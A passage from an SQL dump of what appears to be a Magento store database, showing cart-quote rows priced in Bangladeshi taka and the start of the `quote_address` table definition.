(1252, 1, '2026-05-05 11:49:23', '2026-05-05 11:49:25', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1253, 1, '2026-05-05 16:06:30', '2026-05-05 16:06:30', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1254, 1, '2026-05-05 17:51:00', '2026-05-05 17:51:00', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1255, 1, '2026-05-05 17:51:07', '2026-05-05 17:51:09', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1256, 1, '2026-05-05 17:51:09', '2026-05-05 17:51:09', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1257, 1, '2026-05-05 17:51:15', '2026-05-05 17:51:17', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1258, 1, '2026-05-05 17:51:31', '2026-05-05 17:51:31', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1259, 1, '2026-05-05 17:51:45', '2026-05-05 17:51:47', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(1260, 1, '2026-05-05 17:51:59', '2026-05-05 17:51:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1261, 1, '2026-05-05 19:38:15', '2026-05-05 19:38:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1262, 1, '2026-05-05 23:51:36', '2026-05-05 23:51:36', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1263, 1, '2026-05-06 03:15:28', '2026-05-06 03:15:30', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1264, 1, '2026-05-06 08:00:59', '2026-05-06 08:00:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1265, 1, '2026-05-06 11:00:33', '2026-05-06 11:00:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1266, 1, '2026-05-06 16:08:51', '2026-05-06 16:08:51', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1267, 1, '2026-05-06 18:45:46', '2026-05-06 18:45:49', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1268, 1, '2026-05-06 23:54:09', '2026-05-06 23:54:09', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1269, 1, '2026-05-07 02:29:23', '2026-05-07 02:29:25', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1270, 1, '2026-05-07 07:37:08', '2026-05-07 07:37:08', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1271, 1, '2026-05-07 10:10:25', '2026-05-07 10:10:52', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1272, 1, '2026-05-07 15:53:13', '2026-05-07 15:53:13', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1273, 1, '2026-05-07 17:06:15', '2026-05-07 17:06:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1274, 1, '2026-05-07 18:04:40', '2026-05-07 18:04:44', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1275, 1, '2026-05-07 23:39:56', '2026-05-07 23:39:56', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1276, 1, '2026-05-08 07:13:23', '2026-05-08 07:13:23', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1277, 1, '2026-05-08 07:59:15', '2026-05-08 07:59:16', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1278, 1, '2026-05-08 15:07:29', '2026-05-08 15:07:29', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1279, 1, '2026-05-08 22:33:37', '2026-05-08 22:33:37', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1280, 1, '2026-05-08 23:47:55', '2026-05-08 23:47:56', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1281, 1, '2026-05-09 02:48:27', '2026-05-09 02:48:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '94.72.160.10', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1282, 1, '2026-05-09 05:58:12', '2026-05-09 05:58:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1283, 1, '2026-05-09 14:01:05', '2026-05-09 14:01:05', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1284, 1, '2026-05-09 15:36:34', '2026-05-09 15:36:36', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1285, 1, '2026-05-09 21:30:55', '2026-05-09 21:30:55', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1286, 1, '2026-05-10 05:07:10', '2026-05-10 05:07:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1287, 1, '2026-05-10 07:43:08', '2026-05-10 07:43:10', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1288, 1, '2026-05-10 09:26:10', '2026-05-10 09:26:15', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(1289, 1, '2026-05-10 09:26:16', '2026-05-10 09:26:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1290, 1, '2026-05-10 09:26:36', '2026-05-10 09:26:36', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1291, 1, '2026-05-10 09:26:53', '2026-05-10 09:26:54', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1292, 1, '2026-05-10 09:26:57', '2026-05-10 09:26:58', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(1293, 1, '2026-05-10 09:27:15', '2026-05-10 09:27:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1294, 1, '2026-05-10 09:27:21', '2026-05-10 09:27:21', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1295, 1, '2026-05-10 12:49:18', '2026-05-10 12:49:18', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1296, 1, '2026-05-10 22:20:27', '2026-05-10 22:20:27', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1297, 1, '2026-05-10 23:44:12', '2026-05-10 23:44:14', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1298, 1, '2026-05-11 05:44:31', '2026-05-11 05:44:31', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1299, 1, '2026-05-11 13:26:47', '2026-05-11 13:26:47', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1300, 1, '2026-05-11 15:38:27', '2026-05-11 15:38:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(1301, 1, '2026-05-11 21:06:18', '2026-05-11 21:06:18', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1302, 1, '2026-05-12 04:42:26', '2026-05-12 04:42:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(1303, 1, '2026-05-12 07:26:08', '2026-05-12 07:26:25', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0);

-- --------------------------------------------------------

--
-- Table structure for table `quote_address`
--

CREATE TABLE `quote_address` (
  `address_id` int(10) UNSIGNED NOT NULL COMMENT 'Address ID',
  `quote_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Quote ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `customer_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer ID',
  `save_in_address_book` smallint(6) DEFAULT 0 COMMENT 'Save In Address Book',
  `customer_address_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Customer Address ID',
  `address_type` varchar(10) DEFAULT NULL COMMENT 'Address Type',
  `email` varchar(255) DEFAULT NULL COMMENT 'Email',
  `prefix` varchar(40) DEFAULT NULL COMMENT 'Prefix',
  `firstname` varchar(255) DEFAULT NULL,
  `middlename` varchar(40) DEFAULT NULL,
  `lastname` varchar(255) DEFAULT NULL,
  `suffix` varchar(40) DEFAULT NULL COMMENT 'Suffix',
  `company` varchar(255) DEFAULT NULL COMMENT 'Company',
  `street` varchar(255) DEFAULT NULL COMMENT 'Street',
  `city` varchar(255) DEFAULT NULL,
  `region` varchar(255) DEFAULT NULL,
  `region_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Region ID',
  `postcode` varchar(20) DEFAULT NULL COMMENT 'Postcode',
  `country_id` varchar(30) DEFAULT NULL COMMENT 'Country ID',
  `telephone` varchar(255) DEFAULT NULL,
  `fax` varchar(255) DEFAULT NULL,
  `same_as_billing` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Same As Billing',
  `collect_shipping_rates` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Collect Shipping Rates',
  `shipping_method` varchar(120) DEFAULT NULL,
  `shipping_description` varchar(255) DEFAULT NULL COMMENT 'Shipping Description',
  `weight` decimal(12,4) NOT NULL DEFAULT 0.0000 COMMENT 'Weight',
  `subtotal` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Subtotal',
  `base_subtotal` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Base Subtotal',
  `subtotal_with_discount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Subtotal With Discount',
  `base_subtotal_with_discount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Base Subtotal With Discount',
  `tax_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Tax Amount',
  `base_tax_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Base Tax Amount',
  `shipping_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Shipping Amount',
  `base_shipping_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Base Shipping Amount',
  `shipping_tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Tax Amount',
  `base_shipping_tax_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Tax Amount',
  `discount_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Discount Amount',
  `base_discount_amount` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Base Discount Amount',
  `grand_total` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Grand Total',
  `base_grand_total` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Base Grand Total',
  `customer_notes` text DEFAULT NULL COMMENT 'Customer Notes',
  `applied_taxes` text DEFAULT NULL COMMENT 'Applied Taxes',
  `discount_description` varchar(255) DEFAULT NULL COMMENT 'Discount Description',
  `shipping_discount_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Discount Amount',
  `base_shipping_discount_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Discount Amount',
  `subtotal_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Subtotal Incl Tax',
  `base_subtotal_total_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Subtotal Total Incl Tax',
  `discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Amount',
  `base_discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Amount',
  `shipping_discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Discount Tax Compensation Amount',
  `base_shipping_discount_tax_compensation_amnt` decimal(20,4) DEFAULT NULL COMMENT 'Base Shipping Discount Tax Compensation Amount',
  `shipping_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Shipping Incl Tax',
